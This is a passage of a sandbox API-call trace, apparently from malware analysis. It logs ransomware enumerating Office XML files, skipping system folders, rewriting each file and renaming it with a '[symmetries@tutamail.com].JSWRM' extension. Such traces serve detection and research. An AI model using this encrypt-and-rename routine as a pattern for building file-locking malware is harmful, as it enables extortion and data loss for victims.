lpUsedDefaultChar=0x0) returned 17 [0138.154] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc348b22, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc348b22, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc3bb225, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfb6, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL001.XML", cAlternateFileName="")) returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2=".") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="..") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="...") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="windows") returned -1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="recovery") returned -1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="perflogs") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="documents and settings") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="system volume information") returned -1 [0138.154] lstrcmpiW (lpString1="PGLBL001.XML", lpString2="msocache") returned 1 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL001.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL001.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL001.XML", lpUsedDefaultChar=0x0) returned 12 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL001.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL001.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL001.XML", lpUsedDefaultChar=0x0) returned 12 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL001.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl001.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.155] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4022) returned 1 [0138.155] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.155] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xfb0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xfb0, lpOverlapped=0x0) returned 1 [0138.157] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.157] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xfb0, lpOverlapped=0x0) returned 1 [0138.157] CloseHandle (hObject=0x238) returned 1 [0138.157] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL001.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl001.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL001.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl001.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.158] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15b1fa, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL002.XML", cAlternateFileName="")) returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2=".") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="..") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="...") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="windows") returned -1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="recovery") returned -1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="perflogs") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="documents and settings") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="system volume information") returned -1 [0138.158] lstrcmpiW (lpString1="PGLBL002.XML", lpString2="msocache") returned 1 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL002.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL002.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL002.XML", lpUsedDefaultChar=0x0) returned 12 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL002.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL002.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL002.XML", lpUsedDefaultChar=0x0) returned 12 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL002.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl002.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.159] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1421818) returned 1 [0138.159] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.159] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.175] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.175] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.175] CloseHandle (hObject=0x238) returned 1 [0138.176] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL002.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl002.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL002.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl002.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.177] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d2f32c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d2f32c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d2f32c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3562e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL010.XML", cAlternateFileName="")) returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2=".") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="..") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="...") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="windows") returned -1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="recovery") returned -1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="perflogs") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="documents and settings") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="system volume information") returned -1 [0138.177] lstrcmpiW (lpString1="PGLBL010.XML", lpString2="msocache") returned 1 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL010.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL010.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL010.XML", lpUsedDefaultChar=0x0) returned 12 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL010.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL010.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL010.XML", lpUsedDefaultChar=0x0) returned 12 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL010.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl010.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.178] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=218670) returned 1 [0138.178] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.178] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.191] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.191] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.192] CloseHandle (hObject=0x238) returned 1 [0138.192] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL010.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl010.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL010.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl010.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.193] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c9b60b5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c9b60b5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c9b60b5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1390, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL011.XML", cAlternateFileName="")) returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2=".") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="..") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="...") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="windows") returned -1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="recovery") returned -1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="perflogs") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="documents and settings") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="system volume information") returned -1 [0138.193] lstrcmpiW (lpString1="PGLBL011.XML", lpString2="msocache") returned 1 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL011.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL011.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL011.XML", lpUsedDefaultChar=0x0) returned 12 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL011.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL011.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL011.XML", lpUsedDefaultChar=0x0) returned 12 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL011.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl011.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.194] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5008) returned 1 [0138.194] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.194] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1390, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1390, lpOverlapped=0x0) returned 1 [0138.197] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.197] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1390, lpOverlapped=0x0) returned 1 [0138.197] CloseHandle (hObject=0x238) returned 1 [0138.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL011.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl011.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL011.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl011.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.198] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xcb89a, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL012.XML", cAlternateFileName="")) returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2=".") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="..") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="...") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="windows") returned -1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="recovery") returned -1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="perflogs") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="documents and settings") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="system volume information") returned -1 [0138.198] lstrcmpiW (lpString1="PGLBL012.XML", lpString2="msocache") returned 1 [0138.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL012.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL012.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL012.XML", lpUsedDefaultChar=0x0) returned 12 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL012.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL012.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL012.XML", lpUsedDefaultChar=0x0) returned 12 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.199] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL012.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl012.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.199] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=833690) returned 1 [0138.199] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.200] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.213] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.213] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.213] CloseHandle (hObject=0x238) returned 1 [0138.213] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL012.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl012.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL012.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl012.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.214] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d319566, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d319566, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d319566, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22cf0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL016.XML", cAlternateFileName="")) returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2=".") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="..") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="...") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="windows") returned -1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="recovery") returned -1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="perflogs") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="documents and settings") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="system volume information") returned -1 [0138.215] lstrcmpiW (lpString1="PGLBL016.XML", lpString2="msocache") returned 1 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL016.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL016.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 